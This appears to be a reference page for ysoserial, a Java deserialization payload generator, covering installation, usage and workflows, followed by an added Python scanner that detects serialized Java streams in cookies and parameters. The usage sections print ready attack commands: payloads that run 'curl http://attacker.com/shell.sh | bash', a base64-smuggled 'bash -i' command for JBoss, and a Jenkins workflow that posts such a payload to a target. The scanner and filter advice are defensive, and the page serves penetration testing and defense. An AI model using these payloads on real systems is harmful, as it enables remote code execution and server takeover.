
ysoserial

Java deserialization exploit payload generator

Language: Java | Source: GitHub

Description

ysoserial is a collection of utilities and property-oriented programming "gadget chains", discovered in common Java libraries, for generating payloads that exploit unsafe Java object deserialization. It is a standard tool for testing Java applications that accept serialized objects from untrusted sources.

Installation

BASH
# Download pre-built JAR
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar

# Or build from source
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial && mvn clean package -DskipTests

Basic Usage

BASH
# List available gadget chains
java -jar ysoserial-all.jar

# Generate CommonsCollections1 payload
java -jar ysoserial-all.jar CommonsCollections1 "id" > payload.ser

# RCE via CommonsCollections5
java -jar ysoserial-all.jar CommonsCollections5 "curl http://attacker.com/shell.sh | bash" > payload.ser

Advanced Usage

BASH
# DNS exfiltration (blind testing)
java -jar ysoserial-all.jar URLDNS "http://your-collaborator-url" > dns_payload.ser

# Generate base64-encoded payload
java -jar ysoserial-all.jar CommonsCollections6 "whoami" | base64 -w0

# Exploit JBoss/JMX
java -jar ysoserial-all.jar CommonsCollections1 'bash -c {echo,BASE64_ENCODED_CMD}|{base64,-d}|{bash,-i}' > payload.ser

# Test with different chains
for chain in CommonsCollections1 CommonsCollections2 CommonsCollections3 CommonsCollections4 CommonsCollections5 CommonsCollections6; do
  java -jar ysoserial-all.jar $chain "curl http://callback.oast.fun/$chain" > "${chain}.ser"
done

Common Workflows

BASH
# Blind deserialization testing with OOB callback
java -jar ysoserial-all.jar URLDNS "http://abc123.oast.fun" | base64 -w0
# Inject the base64 payload into Cookie/parameter

# Jenkins exploitation
java -jar ysoserial-all.jar CommonsCollections1 "curl http://attacker.com/shell.sh | bash" > jenkins.ser
curl -X POST http://jenkins-target:8080/upload -d @jenkins.ser
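The workflows above end with a serialized payload being placed in a cookie or request parameter, usually base64-encoded. From the defender's side, the useful complement is a check that recognises such a stream before it reaches an ObjectInputStream. The following is an added example, not part of the ysoserial project: it scans HTTP header, cookie and parameter values for the Java serialization stream magic (0xACED0005) in raw, hex or base64 form and reports any class names typical of known gadget chains. The class-name list, the field parsing and the sample request are constructed for this example; the "stream" in the sample is only a header plus a class-descriptor fragment, not a working chain.

```python
import base64
import binascii
import re

# Every Java serialization stream (ObjectOutputStream) starts with STREAM_MAGIC 0xACED
# followed by STREAM_VERSION 0x0005. In standard base64 these four bytes become "rO0AB".
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"

# Class names that frequently appear in ysoserial gadget-chain payloads (constructed list
# for this example). Presence is a strong signal; absence proves nothing, as other chains exist.
SUSPICIOUS_CLASSES = (
    b"org.apache.commons.collections.functors",
    b"org.apache.commons.collections4.functors",
    b"java.net.URL",  # the URLDNS chain resolves a java.net.URL on deserialization
    b"javax.management.BadAttributeValueExpException",
    b"java.util.PriorityQueue",
)


def decode_candidates(value: bytes):
    """Yield (encoding, bytes) views of a field value: raw, then hex or base64-decoded."""
    yield "raw", value
    text = value.strip()
    if re.fullmatch(rb"(?:[0-9A-Fa-f]{2})+", text):
        yield "hex", bytes.fromhex(text.decode("ascii"))
    elif re.fullmatch(rb"[A-Za-z0-9+/_=-]+", text):
        # Accept standard or URL-safe alphabet and tolerate missing padding.
        padded = text.replace(b"-", b"+").replace(b"_", b"/")
        padded += b"=" * (-len(padded) % 4)
        try:
            yield "base64", base64.b64decode(padded, validate=True)
        except (binascii.Error, ValueError):
            pass


def inspect_field(name: str, value: bytes):
    """Return a finding dict if the value carries a Java serialization stream, else None."""
    for encoding, blob in decode_candidates(value):
        offset = blob.find(JAVA_STREAM_MAGIC)
        if offset == -1:
            continue
        classes = [c.decode("ascii") for c in SUSPICIOUS_CLASSES if c in blob]
        return {"field": name, "encoding": encoding, "offset": offset, "classes": classes}
    return None


def cookie_fields(cookie_header: bytes):
    """Split a Cookie header into ("cookie:<name>", value) pairs; base64 '=' padding is kept."""
    for part in cookie_header.split(b";"):
        key, _, val = part.strip().partition(b"=")
        yield "cookie:" + key.decode("latin-1"), val


def scan_request(headers, params):
    """headers and params are dict[str, bytes]; returns one finding per suspicious field."""
    fields = list(params.items())
    for name, value in headers.items():
        if name.lower() == "cookie":
            fields.extend(cookie_fields(value))
        else:
            fields.append((name, value))
    return [f for f in (inspect_field(n, v) for n, v in fields) if f]


# Constructed sample: stream header plus a TC_OBJECT/TC_CLASSDESC fragment naming java.net.URL.
FAKE_STREAM = JAVA_STREAM_MAGIC + b"\x73\x72\x00\x0cjava.net.URL" + b"\x00" * 8
SAMPLE_HEADERS = {
    "Cookie": b"JSESSIONID=1A2B3C; rememberMe=" + base64.b64encode(FAKE_STREAM),
    "User-Agent": b"Mozilla/5.0",
}
SAMPLE_PARAMS = {"id": b"42", "data": FAKE_STREAM.hex().encode("ascii")}

if __name__ == "__main__":
    for finding in scan_request(SAMPLE_HEADERS, SAMPLE_PARAMS):
        print(finding)
```

Running the block reports the base64 cookie and the hex parameter, both with offset 0 and `java.net.URL` listed. A check like this belongs at a proxy, WAF or logging layer; the actual fix is on the application side, where a JDK 9+ (JEP 290) `ObjectInputFilter`, or the `jdk.serialFilter` system property with an allowlist such as `com.example.**;!*`, rejects gadget classes before they are instantiated.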